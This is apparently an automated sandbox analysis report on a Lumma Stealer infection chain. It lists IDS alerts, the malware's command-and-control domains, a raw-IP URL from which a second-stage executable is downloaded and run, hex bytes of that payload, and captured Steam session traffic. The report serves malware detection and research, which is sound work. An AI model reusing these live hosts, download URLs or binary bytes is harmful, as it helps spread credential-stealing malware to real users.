    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0059BD88
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ebx, edx3_2_005ADE57
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_005AEE1A
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov ecx, eax3_2_005C0E12
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl3_2_005AEE08
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h3_2_005ABE07
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]3_2_0059BE2C
    Source: C:\Users\user\AppData\Local\Temp\E6F4.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh3_2_005C2F87

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2059035 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop) : 192.168.2.8:60683 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059057 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop) : 192.168.2.8:56872 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059041 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop) : 192.168.2.8:57475 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059051 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop) : 192.168.2.8:59246 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059043 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop) : 192.168.2.8:60470 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059039 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop) : 192.168.2.8:49547 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059037 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop) : 192.168.2.8:58813 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059088 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click) : 192.168.2.8:59678 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2059049 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop) : 192.168.2.8:59388 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49709 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: skidjazzyric.click
    Source: Malware configuration extractorURLs: versersleep.shop
    Source: Malware configuration extractorURLs: soundtappysk.shop
    Source: Malware configuration extractorURLs: apporholis.shop
    Source: Malware configuration extractorURLs: crowdwarek.shop
    Source: Malware configuration extractorURLs: chipdonkeruz.shop
    Source: Malware configuration extractorURLs: femalsabler.shop
    Source: Malware configuration extractorURLs: handscreamny.shop
    Source: Malware configuration extractorURLs: robinsharez.shop
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 12 Jan 2025 16:45:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 12 Jan 2025 16:45:01 GMTETag: "62a00-62b850c908464"Accept-Ranges: bytesContent-Length: 403968Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ec be f9 b4 a8 df 97 e7 a8 df 97 e7 a8 df 97 e7 b6 8d 13 e7 89 df 97 e7 b6 8d 02 e7 bc df 97 e7 b6 8d 14 e7 c4 df 97 e7 8f 19 ec e7 ab df 97 e7 a8 df 96 e7 d9 df 97 e7 b6 8d 1d e7 a9 df 97 e7 b6 8d 03 e7 a9 df 97 e7 b6 8d 06 e7 a9 df 97 e7 52 69 63 68 a8 df 97 e7 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 f9 fd 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 36 04 00 00 70 08 00 00 00 00 00 b7 14 00 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 0c 00 00 04 00 00 02 17 07 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 cc 69 04 00 28 00 00 00 00 80 0b 00 10 69 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ac 34 04 00 00 10 00 00 00 36 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 56 22 00 00 00 50 04 00 00 24 00 00 00 3a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 08 7c 06 00 00 80 04 00 00 16 00 00 00 5e 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 6f 73 75 00 00 00 e5 53 00 00 00 00 0b 00 00 48 00 00 00 74 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 75 77 61 76 00 00 5a 01 00 00 00 60 0b 00 00 02 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 6f 78 61 68 00 00 0c 00 00 00 00 70 0b 00 00 02 00 00 00 be 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 69 01 00 00 80 0b 00 00 6a 01 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
    Source: Joe Sandbox ViewIP Address: 172.67.179.207 172.67.179.207
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewIP Address: 176.113.115.19 176.113.115.19
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 104.102.49.254:443
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49708 -> 176.113.115.19:80
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49707 -> 172.67.179.207:443
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.19
    Source: C:\Users\user\Desktop\lBb4XI4eGD.exeCode function: 0_2_004029EA InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_004029EA
    Source: global trafficHTTP traffic detected: GET /track_prt.php?sub=0&cc=DE HTTP/1.1User-Agent: ShareScreenHost: post-to-me.com
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: GET /ScreenUpdateSync.exe HTTP/1.1User-Agent: ShareScreenHost: 176.113.115.19
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.c equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.c equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: jContent-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b2836c4de18c57dea14fd299; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:45:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control{o equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
    Source: E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=b2836c4de18c57dea14fd299; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type25665Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveSun, 12 Jan 2025 16:45:32 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control{o equals www.youtube.com (Youtube)
    Source: global trafficDNS traffic detected: DNS query: post-to-me.com
    Source: global trafficDNS traffic detected: DNS query: skidjazzyric.click
    Source: global trafficDNS traffic detected: DNS query: soundtappysk.shop
    Source: global trafficDNS traffic detected: DNS query: femalsabler.shop
    Source: global trafficDNS traffic detected: DNS query: apporholis.shop
    Source: global trafficDNS traffic detected: DNS query: crowdwarek.shop
    Source: global trafficDNS traffic detected: DNS query: versersleep.shop
    Source: global trafficDNS traffic detected: DNS query: chipdonkeruz.shop
    Source: global trafficDNS traffic detected: DNS query: handscreamny.shop
    Source: global trafficDNS traffic detected: DNS query: robinsharez.shop
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
    Source: lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe
    Source: lBb4XI4eGD.exe, 00000000.00000003.1549198140.0000000000846000.00000004.00000020.00020000.00000000.sdmp, lBb4XI4eGD.exe, 00000000.00000002.3954535854.0000000000846000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe0
    Source: lBb4XI4eGD.exe, 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://176.113.115.19/ScreenUpdateSync.exe5h48t4j4t1rrSOFTWARE
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000687000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.c
    Source: E6F4.tmp.exe, 00000003.00000003.1588256646.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588814170.00000000006AF000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
    Source: E6F4.tmp.exe, 00000003.00000002.1651189199.0000000000691000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
    Source: E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chipdonkeruz.shop/api
    Source: E6F4.tmp.exe, 00000003.00000002.1651259775.00000000006AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=SCXpgixTDzt4&a
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=engli
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006ED000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651785791.0000000002CC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
    Source: E6F4.tmp.exe, 00000003.00000003.1588150005.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000002.1651114679.0000000000678000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588180595.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, E6F4.tmp.exe, 00000003.00000003.1588600315.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
